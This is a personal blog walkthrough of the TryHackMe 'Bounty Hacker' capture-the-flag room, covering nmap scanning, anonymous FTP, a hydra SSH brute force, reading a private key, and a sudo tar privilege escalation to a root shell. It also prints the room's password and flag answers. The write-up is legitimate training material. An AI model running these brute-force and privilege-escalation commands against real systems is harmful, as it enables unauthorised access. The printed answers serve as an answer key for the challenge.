TryHackMe CTF : Bounty Hacker – Walkthrough

November 24, 2024
Posted in CTF, TryHackMe
November 24, 2024 Jasper

TryHackMe CTF: Bounty Hacker — Walkthrough

Hi! This is my walkthrough on the Bounty Hacker CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Room URL: https://tryhackme.com/room/cowboyhacker


Task 1 (Living up to the title)

You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they’d take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future! Let’s prove that we are a true Bounty Hacker!

Questions

Deploy the machine.

Answer: No answer needed.

Find open ports on the machine

I found that scanning all ports took way to long on my AttackBox so I simply selected the top 100 ports:

nmap --top-ports 100 10.10.5.226

I found 3 open ports: 21 (ftp), 22 (ssh) and port 80 (http).

Let’s do a more detailed port scan of those 3 ports:

nmap -A -p 21,22,80 10.10.5.226
Port scanning with nmap

We found a webpage:

Bounty Hacker

 

Webserver running on port 80

But more importantly for this task, anonymous access is available on the FTP service. We can also see that there is a task.txt file on it.

Answer: No answer needed

Who wrote the task list?

Great job so far, Bounty Hacker. Let’s try logging in on the ftp service:

ftp <ip address>
Getting access to the ftp server

We can see that lin has written the note.

Answer: lin

What service can you bruteforce with the text file found?

There is another text file on the ftp server: locks.txt. It has the following content:

Wordlist for cracking SSH

This looks to be like some kind of wordlist that we can use to gain access to a server. Since we have a protected ssh access to the server I am going to guess we can bruteforce it.

Answer: ssh

What is the users password?

To bruteforce lin’s password we can use hydra. We know the username and in addition have a wordlist to use. Download the locks.txt file to your machine:

mget *.txt

Run the following hydra command:

hydra -l lin -P locks.txt -t 6 ssh://<machine ip>

This quickly cracked the password:

Results of running hydra

Answer: RedDr4gonSynd1cat3

user.txt

Now we know the password and username, we can log on to the SSH service.

ssh lin@10.10.5.226

And type in the password.

This is going very smoothly. We have access and can see the user.txt file:

Logging in to SSH

Answer: THM{CR1M3_SyNd1C4T3}

root.txt

Now, all we need it root access to read the file called root.txt. We need more info to figure out what to do next. It’s time for some enumeration.

Enumeration

Let’s look at different attack vectors.

User’s Home Directory Contents

Listing files in the home directory

Let’s look at the .ssh folder in a bit.

Home Directory Contents

If we look at possible other users’ home directory we don’t see directories of other users:

Listing directories in home directory

There are no other user directories.

List current processes

ps aux
Looking at running processes

Interesting username. Whoopsie…

But this is completely innocent:

In Ubuntu, whoopsie is a daemon that is responsible for collecting error reports from apport and then sending that report to Canonical if the user agrees to this in the apport confirmation dialog.

SSH Directory Contents

List the ssh content by entering:

ls -l ~/.ssh
Checking out the .ssh folder

Interesting!

cat ~/.ssh/id_rsa

But we already have ssh access! Just wanted to show you anyways 🙂

Bash History

We can look at previously run terminal commands. Run history.

history

Nothing to see here.

Cron Jobs

ls -la /etc/cron.daily/
Checking it out daily cron jobs

passwd looks interesting.

passwd cron process

But after some googling I found out this is a completely innocent normal process.

Sudo — List User’s Privileges

sudo -l
Listing user privileges

Now, this is interesting! We got root access on the /bin/tar command. This is something we can exploit! I found the following info at this page:

https://gtfobins.github.io/gtfobins/tar/

Sudo tar exploit

Run this command:

sudo tar -cf /dev/null /dev/null — checkpoint=1 — checkpoint-action=exec=/bin/sh
Running the exploit and gaining root access

We got root access. Find the file in the root directory and read it:

Reading the flag

Answer: THM{80UN7Y_h4cK3r}

We are done! I hope it made sense. Bounty Hacker definitely was an easier CTF, but I have to admit that the last step was kinda tricky to figure out. I hope you learned that proper enumeration is very important! Thanks for reading, and give me a clap if you like 🙂


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

Leave a Reply

Your email address will not be published. Required fields are marked *